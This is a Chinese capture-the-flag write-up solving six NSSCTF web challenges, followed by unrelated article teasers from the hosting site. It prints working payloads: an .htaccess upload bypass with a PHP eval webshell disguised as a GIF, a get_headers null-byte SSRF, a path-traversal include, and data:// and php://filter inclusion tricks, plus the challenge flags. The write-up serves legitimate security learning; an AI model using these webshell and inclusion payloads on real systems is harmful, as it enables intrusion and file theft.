NSSCTF之Web篇刷题记录(13)

news2024/11/28 0:40:35

NSSCTF之Web篇刷题记录[12]

    • [GXYCTF 2019]BabyUpload:
    • [GKCTF 2020]cve版签到:
    • [HCTF 2018]Warmup:
    • [GDOUCTF 2023]泄露的伪装:
    • [羊城杯 2020]easycon:
    • [HNCTF 2022 Week1]Interesting_include:

NSSCTF平台:https://www.nssctf.cn/
PS:记得所有的flag都改为NSSCTF

[GXYCTF 2019]BabyUpload:

在这里插入图片描述

先传了一个一句话木马然后过滤了上传一个.htaccess文件 AddType application/x-httpd-php .jpeg(将.jpeg文件解析为php文件)

在这里插入图片描述

在这里插入图片描述
这里我们可以解析jpeg后 继续上传一个一句话木马的jpeg 但是 这里还有过滤(诶,别蒙我啊,这标志明显还是php啊)修改为:

GIF89a  
<script language="php">eval($_POST['cmd']);</script>

在这里插入图片描述

然后蚁🗡连接在根目录下看到flag

在这里插入图片描述

在这里插入图片描述

NSSCTF{13452adb-4b78-4942-bdea-9f90c17d4507}

[GKCTF 2020]cve版签到:

在这里插入图片描述
PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的get_headers()函数存在安全漏洞(\0可以截断)。攻击者可利用该漏洞造成信息泄露

使用%00截断 说我们url请求必须包含.ctfhub.com F12 提示flag在本地,还告诉了我们主机名必须以123结尾

在这里插入图片描述
Payload:?url=http://127.0.0.123%00www.ctfhub.com

在这里插入图片描述

NSSCTF{80f1e680-dcd3-407f-b001-fe43442fed83}

[HCTF 2018]Warmup:

在这里插入图片描述
在这里插入图片描述

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?> 

文件包含 Payload:file=hint.php?../../../../../ffffllllaaaagggg

在这里插入图片描述
在这里插入图片描述

NSSCTF{c5a0500a-bc52-40e2-b4e4-6155dc4ba55e}

[GDOUCTF 2023]泄露的伪装:

使用dirsearch 扫到了www.rar 打开文档有个路径 进行访问 然后就是代码审计

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

文件包含 根据代码审计以及file_get_contents读取文件内容函数我们可以知道我们需要传入一个文件,这里可以利用data://伪协议

Pyload:orzorz.php?cxk=data://text/plain,ctrl

在这里插入图片描述

NSSCTF{33af9a1f-f959-4d87-bdd0-e82ed1087876}

[羊城杯 2020]easycon:

一个Ubuntu默认页面访问index.php,提示eval post cmd应该是有一句话
直接蚁剑连接 🆗成功连接 发现bbbbbbbbb.txtBase64转图片

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Base64转图片:https://tool.jisuapi.com/base642pic.html

在这里插入图片描述

NSSCTF{do_u_kn0w_c@idao}

[HNCTF 2022 Week1]Interesting_include:

在这里插入图片描述
直接文件包含flag.php使用伪协议?filter=php://filter/convert.base64-encode/resource=flag.php Base64解码即可。
在这里插入图片描述

NSSCTF{57b43a46-bd1c-4a2e-b15d-5bccff598016}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/597989.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

还有人不知道,加盟连锁店该怎么做?酒店加盟连锁店如何招商?

还有人不知道&#xff0c;加盟连锁店该怎么做&#xff1f;酒店加盟连锁店如何招商&#xff1f; 想要创业的新人&#xff0c;一进到电商行业&#xff0c;看到繁杂的模式以及激烈的竞争关系&#xff0c;都没到平台亏钱的那一步&#xff0c;自己就先泄气了。一个企业能否发展起来&…

The Category-theoretic Perspective of Statistical Learning for Amateurs

统计学习.范畴论视角 title: The Category-theoretic Perspective of Statistical Learning for Amateurs author: Congwei Song description: A representation in BIMSA The Category-theoretical Perspective of Statistical Learning for Amateurs Congwei Song Email: …

基于SSM的疫苗接种平台

末尾获取源码 开发语言&#xff1a;Java Java开发工具&#xff1a;JDK1.8 后端框架&#xff1a;SSM 前端&#xff1a;Vue 数据库&#xff1a;MySQL5.7和Navicat管理工具结合 服务器&#xff1a;Tomcat8.5 开发软件&#xff1a;IDEA / Eclipse 是否Maven项目&#xff1a;是 目录…

抢先看!文档控件aspose.words 新版本23.05 有哪些亮点?

Aspose.Words是一种高级Word文档处理API&#xff0c;用于执行各种文档管理和操作任务。API支持生成&#xff0c;修改&#xff0c;转换&#xff0c;呈现和打印文档&#xff0c;而无需在跨平台应用程序中直接使用Microsoft Word。 Aspose API支持流行文件格式处理&#xff0c;并…

Flutter-布局(Layout)原理

1、约束、尺寸、位置 overrideWidget build(BuildContext context) {return Scaffold(body: LayoutBuilder(builder: (context, constraints) {print("body约束:" constraints.toString());return Container(color: Colors.black,width: 300,height: 300,child: L…

计算机中丢失vcomp140.dll解决方案,可以使用这个3种方法修复

vcomp140.dll是一个动态连接库文件&#xff0c;它是Microsoft Visual Studio 2015应用程序所必需的运行库文件之一。它在Visual C Redistributable for Visual Studio 2015包中提供&#xff0c;是用于支持Microsoft C/C OpenMP Runtime的库文件。计算机中丢失vcomp140.dll无法打…

LNMP网站框架搭建(编译安装)

目录 一、Nginx的工作原理 工作进程&#xff1a; 二、Nginx编译安装安装 三、mysql的编译安装 四、php的编译安装 验证PHP与nginx的是否连接 验证lnmp的是否搭建成功 五、部署 Discuz&#xff01;社区论坛 六、fpm参数优化 一、Nginx的工作原理 php-fpm.conf …

Redis数据类型之String——字符串、数值、bitmap

Redis数据类型之String——字符串、数值、bitmap 注意索引位置一般从左到右 0开始&#xff0c;叫正向索引。从右到左-1开始叫反向索引 字符串 字符串有很多操作set、get、append、setrange、getrange等&#xff0c;每个都有自己对应的用处 SET SET key value 设置指定 key …

单元测试系列:一、了解spring boot单元测试

一、java 单元测试框架 java当前主流的测试框架有两个&#xff1a;JUnit、TestNG。 1、两者相同点 使用annotation&#xff0c;且大部分annotation相同。都可以进行单元测试&#xff08;Unit test&#xff09;。都是针对Java测试的工具。 2、两者不同点 JUnit只能进行单元…

【Axure教程】大小图动态轮播

大小图动态轮播常用于展示多张图片&#xff0c;其中包含两种不同尺寸的图片。这种类型的轮播通常用于网站首页、产品展示、广告宣传等场景&#xff0c;提供更丰富的展示方式&#xff0c;吸引用户的注意力并提供更多信息。通过切换不同的图片&#xff0c;可以有效地传达多个内容…

采购异常支出怎么造成的?如何控制?

采购管理中的"异常支出 "是指在企业预定的支出规则之外进行的交易。虽然大多数大型采购都是与知名供应商合作&#xff0c;并直接通过采购团队的合同进行&#xff0c;但并不是所有的采购都是这样正式进行的&#xff0c;这可能会导致支出不明的问题。 什么原因造成异常…

15-创建Vue3.0工程

目录 1.使用 vue-cli 创建2.使用 vite 创建 1.使用 vue-cli 创建 官方文档&#xff1a;https://cli.vuejs.org/zh/guide/creating-a-project.html#vue-create ## 查看vue/cli版本&#xff0c;确保vue/cli版本在4.5.0以上 vue --version ## 安装或者升级你的vue/cli npm insta…

创建孔、缩放、复制和粘贴

创建孔 项目概况&#xff1a; 在本项目中&#xff0c;您将学习如何使用孔特征从另一个形状中去除材料。 在Tinkercad上查看整个项目 指示 将蓝色多边形形状拖动到工作平面上&#xff0c;并将其放置在以橙色勾勒的区域。 提示&#xff1a; 您可能需要向下滚动形状列表才能找到…

kendoUI中的Observable详解

kendoUI中的Observable方法 一、前言 Kendo UI是一个基于JavaScript的开源UI框架&#xff0c;它提供了一系列的UI组件和工具&#xff0c;包括表格、图表、表单、对话框等。Kendo UI中的Observable是一个非常重要的概念&#xff0c;它可以帮助我们更好地理解和使用Kendo UI。 …

如何把握住数字化时代的浪潮,数据要素是关键

随着美国、欧洲的数字、数据战略相继出现&#xff0c;这意味着数据在未来的价值已经不是什么秘密&#xff0c;而是对未来世界发展的共识。IDC曾经预测过到2025年中国产生的数据总量将会达到48.6ZB&#xff0c;占全球的27.8%。这就是在未来发展数据战略的底气&#xff0c;也标志…

二叉树详解:带你掌握二叉树

目录 前言1. 树型结构1. 1 树的概念1.2 树的特点1.3 树的相关术语 2. 二叉树&#xff08;binary tree&#xff09;2.1 二叉树的概念2.2 二叉树中的特殊树2.2.1 满二叉树2.2.2 完全二叉树 2.3 二叉树的性质 3. 二叉树的遍历3.1 前序遍历3.2 中序遍历3.3 后序遍历3.4 层序遍历 总…

基于matlab使用蒙特卡罗模拟生成雷达系统的接收机工作特性 (ROC) 曲线

一、前言 此示例说明如何使用蒙特卡罗模拟生成雷达系统的接收机工作特性 &#xff08;ROC&#xff09; 曲线。接收器工作特性决定了系统在目标不存在&#xff08;误报&#xff09;时抑制大杂散信号值时检测目标的能力。检测系统将通过将接收到的信号值与预设阈值进行比较来声明…

Angular学习笔记:environment.ts文件

本文是自己的学习笔记&#xff0c;主要参考资料如下。 - B站《Angular全套实战教程》&#xff0c;达内官方账号制作&#xff0c;https://www.bilibili.com/video/BV1i741157Fj?https://www.bilibili.com/video/BV1R54y1J75g/?p32&vd_sourceab2511a81f5c634b6416d4cc1067…

网络监控工具

网络监控是一项重要的 IT 操作&#xff0c;可控制网络中的危险信号&#xff0c;并有助于避免潜在的业务问题。网络监控工具提供有关网络可用性和运行状况的见解&#xff0c;并跟踪 CPU 使用率、延迟和数据包丢失等关键性能指标&#xff0c;使管理员能够全面了解网络。 为什么网…

Kafka Schema-Registry

一、为什么需要Schema-Registry 1.1、注册表 无论是 使用传统的Avro API自定义序列化类和反序列化类 还是 使用Twitter的Bijection类库实现Avro的序列化与反序列化&#xff0c;这两种方法都有一个缺点&#xff1a;在每条Kafka记录里都嵌入了schema&#xff0c;这会让记录的大…